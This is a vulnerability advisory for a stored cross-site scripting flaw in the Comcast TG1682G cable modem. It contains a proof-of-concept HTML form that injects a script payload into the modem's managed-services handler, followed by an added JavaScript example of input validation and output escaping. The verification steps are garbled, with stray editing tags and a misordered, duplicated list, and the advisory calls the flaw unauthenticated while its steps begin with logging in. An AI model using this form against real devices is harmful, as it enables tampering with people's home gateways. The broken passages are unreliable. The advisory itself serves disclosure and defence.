Comcast Cable Modem (Unauthenticated Stored XSS)

Credit Nu11By73


Overview

The Comcast home cable modem, model TG1682G, was found by researchers to contain a stored cross-site scripting (XSS) vulnerability. It can be exploited without authentication by an attacker on the local network.

Device Description:
1 port residential gateway
Hardware Version:
eMTA & DOCSIS
Original Software Version:
10.0.59.SIP.PC20.CT
Software Image:
TG1682_2.0s7_PRODse
Advanced Services:
TG1682G

Exploitation Writeup

The Comcast ARRIS home cable modem was tested against many different vulnerability classes. This testing led to the identification of a stored cross-site scripting vulnerability that could be exploited without authentication. Below is the proof-of-concept code that was used to issue an HTTP POST to the backend software.


Verification:

Managed Devices
1. Log in to the modem
</gml_replace>
<gr_replace lines="34" cat="clarify" orig="6. When">
6. When the page refreshes you will see the pop-up
2. Click parental control
3. Click managed devices
4. Click add blocked device
5. In the custom device boxes type what is shown in the first image and click save
6. When the page refreshes you will see the popup




Managed Services
1. Click on the managed services button
2. Click on the add button next to blocked services
3. Enter the information shown in the first screen shot below and click save
4. Once the site is done rendering you will receive the pop-up




Connected Devices
1. Click connected devices
2. Click add device with reserved ip
3. Add the information shown in the first screenshot below
4. Click save and wait for the page to refresh to receive the pop-ups





Proof of concept code:
The code below was used to exploit the application. It is a plain HTML form that submits the same fields the modem's own managed-services page sends to its backend; the service name field carries the script payload, which the device stores and later renders without encoding.

Managed Services POC
<html>
<!-- Proof-of-concept form from the advisory: posts a managed-services entry to the modem's backend -->
<p>Unauth Stored XSS - Xfinity Modem</p>
<form method="POST" action="http://192.168.0.1/actionHandler/ajax_managed_services.php">
<input type="hidden" name="set" value="true" />
<input type="hidden" name="UMSStatus" value="Enabled" />
<input type="hidden" name="add" value="true" />
<!-- the service name is stored as-is and echoed back into the page unescaped -->
<input type="hidden" name="service" value="test><script>alert(1)</script>" />
<input type="hidden" name="protocol" value="TCP" />
<input type="hidden" name="startPort" value="1" />
<input type="hidden" name="endPort" value="2" />
<input type="hidden" name="block" value="true" />
<input type="submit" title="Enable Service" />
</form>
</html>
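The root cause on the device side is that the submitted service name is stored verbatim and later interpolated into the management page's HTML. The following is an added example, not Comcast or ARRIS code and not the actual PHP handler, showing the two controls that would have closed the hole: strict input validation of the fields the form above submits, and HTML escaping at render time. The field names (service, protocol, startPort, endPort) are taken from the proof-of-concept form; the length limit, character allowlist and the table-row markup are assumptions chosen for illustration.

```javascript
// Added example (not vendor code): validate and safely render a managed-service
// entry. Field names follow the PoC form on this page; constraints are assumed.

// Escape the five HTML metacharacters so stored text is rendered as text,
// never parsed as markup. This is the render-time control.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Validate a submission before storing it. Returns { ok, errors }.
// Assumed rules: service name 1..32 chars of letters, digits, space, '.', '_', '-';
// protocol TCP or UDP; ports 1..65535 with startPort <= endPort.
function validateService(fields) {
  const errors = [];
  const name = fields.service || "";
  if (!/^[A-Za-z0-9 ._-]{1,32}$/.test(name)) {
    errors.push("service: invalid characters or length");
  }
  if (!["TCP", "UDP"].includes(fields.protocol)) {
    errors.push("protocol: must be TCP or UDP");
  }
  const start = Number(fields.startPort);
  const end = Number(fields.endPort);
  const portOk = (p) => Number.isInteger(p) && p >= 1 && p <= 65535;
  if (!portOk(start) || !portOk(end)) {
    errors.push("port: out of range");
  } else if (start > end) {
    errors.push("port: startPort greater than endPort");
  }
  return { ok: errors.length === 0, errors };
}

// Rendering as the vulnerable device does it: raw interpolation of stored fields.
function renderRowVulnerable(rec) {
  return `<tr><td>${rec.service}</td><td>${rec.protocol}</td>` +
         `<td>${rec.startPort}-${rec.endPort}</td></tr>`;
}

// Rendering with output encoding: every stored value passes through escapeHtml.
function renderRowFixed(rec) {
  return `<tr><td>${escapeHtml(rec.service)}</td><td>${escapeHtml(rec.protocol)}</td>` +
         `<td>${escapeHtml(rec.startPort)}-${escapeHtml(rec.endPort)}</td></tr>`;
}

// Constructed sample: the field values submitted by the PoC form above.
const POC_SUBMISSION = {
  set: "true", UMSStatus: "Enabled", add: "true",
  service: "test><script>alert(1)</script>",
  protocol: "TCP", startPort: "1", endPort: "2", block: "true",
};

// Constructed sample of a legitimate entry for comparison.
const BENIGN_SUBMISSION = { service: "ssh", protocol: "TCP", startPort: "22", endPort: "22" };

// Run both controls over both samples and report what each would have done.
function demo() {
  return {
    pocRejected: !validateService(POC_SUBMISSION).ok,
    benignAccepted: validateService(BENIGN_SUBMISSION).ok,
    vulnerableHtml: renderRowVulnerable(POC_SUBMISSION),
    fixedHtml: renderRowFixed(POC_SUBMISSION),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Either control alone would have stopped the pop-up described in the verification steps: validation rejects the payload before it is stored, and escaping turns a stored payload into inert text when the page is rebuilt. In practice both are wanted, since validation rules tend to loosen over time and the render-time encoding is what protects every place the value is later displayed.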